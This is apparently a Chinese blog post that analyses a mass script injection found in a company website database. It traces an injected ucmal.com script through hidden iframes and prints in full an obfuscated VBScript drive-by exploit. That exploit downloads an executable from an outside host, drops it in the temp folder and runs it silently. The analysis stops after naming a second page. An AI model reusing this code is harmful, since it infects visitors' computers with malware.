安装SXE 服务端
中国式闹剧:十进制网络和IPv9
今天发现含公司的网站数据库所有的字符串字段中包含代码,内容如下:
<script src=http://ucmal.com/0.js></script>
打开这个js代码如下:
function setCookie(name,value)
{
var Days = 1;
var exp = new Date();
exp.setTime(exp.getTime() + Days*1*60*60*1000);//Days*24*60*60*1000;
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln("<iframe src='http://index.htm1.ws/117.htm?id=mg' width=100 height=0><\/iframe>");
setCookie("Lin","ok");
return null;
}
}
getCookie("Lin")
查看http://index.htm1.ws/117.htm?id=mg文件,代码如下:
<iframe src=http://htm1.ws/www/014.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/r2.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/bd.htm width=100 height=0></iframe>
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=360631815&logo=1"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1519290.js"></script>
对于下面三个文件,我们分析如下:
http://htm1.ws/www/014.htm页面
<script language=VBScript>
On Error Resume Next
Cike = "http://www.axgzba2.com/x/2.exe"
Set Cike2 = document.createElement("object")
Cikeid="clsid:"
Cikeidx="BD96"
Cikeid2="C556-65"
Cikeid3="A3-11D"
Cikeid4="0-98"
Cikeid5="3A-00C"
Cikeid6="04FC29E36"
Cike3="Microsoft.X"
Cike4="MLHTTp"
Cike2.SetAttribute "classid", Cikeid&Cikeidx&Cikeid2&Cikeid3&Cikeid4&Cikeid5&Cikeid6
Cike5=Cike3&Cike4
Set loveCike = Cike2.CreateObject(Cike5,"")
loveCike.Open "GET", Cike, False
loveCike.Send
Qq_123456="microsofts.pif"
Qq_123456s="microsofts.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456ssss="b.stream"
Q123456sssss=Q123456sss&Q123456ssss
Set chilam = Cike2.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
Qq_123456=chilam.BuildPath(yingying,Qq_123456)
Qq_123456s=chilam.BuildPath(yingying,Qq_123456s)
Set chilams = Cike2.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write loveCike.ResponseBody
chilams.Savetofile Qq_123456,2
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "Set LoveCike = CreateObject(""Wscript.Shell"")"&vbCrLf&"LoveCike.run ("""&Qq_123456&""")"
chilams.Savetofile Qq_123456s,2
chilams.Close
cute="Shell.Applica"
qq="tion"
Set cute_qq = Cike2.createobject(cute&qq,"")
Qq123456="O"
Qq123456s="p"
Qq123456ss="e"
Qq123456sss="n"
cute_qq.SHellExECuTe Qq_123456s,"","",Qq123456&Qq123456s&Qq123456ss&Qq123456sss,0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body >
http://htm1.ws/www/r2.htm页面
请给这篇日志评个分吧!
